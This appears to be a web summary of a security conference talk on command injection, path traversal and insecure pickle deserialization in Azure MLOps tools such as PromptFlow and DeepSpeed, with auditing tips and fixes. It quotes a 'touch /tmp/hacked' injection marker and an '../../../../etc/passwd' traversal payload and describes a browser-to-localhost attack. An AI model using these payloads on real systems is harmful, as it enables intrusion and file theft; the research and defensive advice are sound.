The Oversights under The Flow: Discovering and Demystifying the Vulnerable Tooling Suites from Azure MLOps
This talk demonstrates multiple command injection and path traversal vulnerabilities within Azure MLOps tooling suites, including PromptFlow, DeepSpeed, and TorchGeo. The research highlights how insecure use of Python's subprocess and pickle modules in these tools allows for remote code execution and privilege escalation. The speaker emphasizes the critical need for secure coding practices in machine learning infrastructure and the limitations of current automated security auditing tools. The presentation includes several proof-of-concept exploits targeting these vulnerabilities.
Remote Code Execution via Insecure Deserialization in Azure MLOps Tooling
TLDR: Recent research into Azure MLOps tooling reveals critical vulnerabilities in popular libraries like PromptFlow, DeepSpeed, and TorchGeo. Attackers can leverage insecure use of Python’s
subprocessandpicklemodules to achieve remote code execution or privilege escalation. Pentesters should prioritize auditing MLOps pipelines for these injection vectors, while developers must move away from dangerous functions likeeval()andpickle.load()in favor of safer alternatives.
Machine learning infrastructure is the new frontier for supply chain attacks. While security teams scramble to secure LLM prompts and model weights, the underlying tooling suites—the very software used to build, test, and deploy these models—are often left wide open. The research presented at Black Hat 2025 on Azure MLOps tooling proves that we are repeating the same mistakes in the AI space that we made in web development a decade ago.
The Mechanics of the Failure
The core issue identified in tools like PromptFlow and DeepSpeed is a fundamental failure to treat user-controlled input as untrusted. In many cases, these tools take configuration parameters or file paths from a user and pass them directly into dangerous Python functions.
Take the command injection vulnerability found in PromptFlow. The application uses Python’s subprocess.Popen to execute system commands, but it fails to properly sanitize the arguments. By manipulating the input, an attacker can break out of the intended command structure. The talk demonstrated a proof-of-concept where an attacker triggers a touch /tmp/hacked command, confirming that the shell is executing arbitrary input. This is a classic OWASP A03:2021-Injection scenario, but it is happening inside a specialized machine learning environment where security controls are often weaker.
The situation is even more dire with DeepSpeed, which suffers from insecure deserialization. The library uses the pickle module to handle data transfers between distributed training nodes. As any experienced researcher knows, pickle is inherently unsafe. If an attacker can influence the serialized data stream, they can force the application to execute arbitrary code upon deserialization. This is a textbook OWASP A08:2021-Software and Data Integrity Failures.
From Local to Remote: The 1-Click Trap
One of the most compelling parts of this research is how it bridges the gap between a "local" vulnerability and a remote exploit. Many of these tools, such as the Azure CLI extensions, are designed to listen on localhost by default. Developers often assume that because the service is bound to 127.0.0.1, it is safe from external threats.
This assumption is dangerous. If a developer visits a malicious website while their local MLOps service is running, that site can use JavaScript to send requests to the local port. This is the "1-click" attack vector. The browser acts as a proxy, sending the malicious payload to the local service. If the service is vulnerable to command injection or path traversal, the attacker gains a foothold on the developer's machine. This is exactly what happened with CVE-2024-43591, where improper handling of commands allowed for potential exploitation.
Auditing Your Pipeline
If you are performing a penetration test on an organization that uses these tools, stop looking only at the web application. Start looking at the MLOps pipeline.
- Map the attack surface: Identify every tool in the pipeline that accepts configuration files, YAML manifests, or serialized data.
- Test for injection: Use standard payloads to see if you can trigger unexpected behavior in the underlying OS. If a tool takes a file path, try a path traversal payload like
../../../../etc/passwd. - Check for deserialization: If you see any evidence of
pickle,marshal, orshelvebeing used to load data, you have a high-probability RCE vector.
The Defensive Reality
The fix is simple in theory but difficult in practice. Developers must stop using eval(), pickle, and shell-executing functions with unsanitized input. The research showed that even when vendors attempt to patch these issues, they often miss secondary code paths. For example, a patch might fix a vulnerability in one module but leave an identical, vulnerable pattern in a related security module.
Defenders need to implement strict input validation and, where possible, use safer serialization formats like JSON or Protobuf. Furthermore, automated security scanners are currently failing to catch these issues because they often lack the context to understand how these specialized ML libraries interact with the operating system.
We are currently in a "Wild West" phase for AI infrastructure. The tools are being built for speed and functionality, with security as an afterthought. As a researcher or pentester, your goal should be to find these oversights before they are weaponized in the wild. If you find a tool that is "automating" your ML workflow, assume it is doing so insecurely until you prove otherwise.
CVEs
Vulnerability Classes
Target Technologies
OWASP Categories
All Tags
Up Next From This Conference
Similar Talks

Kill List: Hacking an Assassination Site on the Dark Web

Unmasking the Snitch Puck: The Creepy IoT Surveillance Tech in the School Bathroom




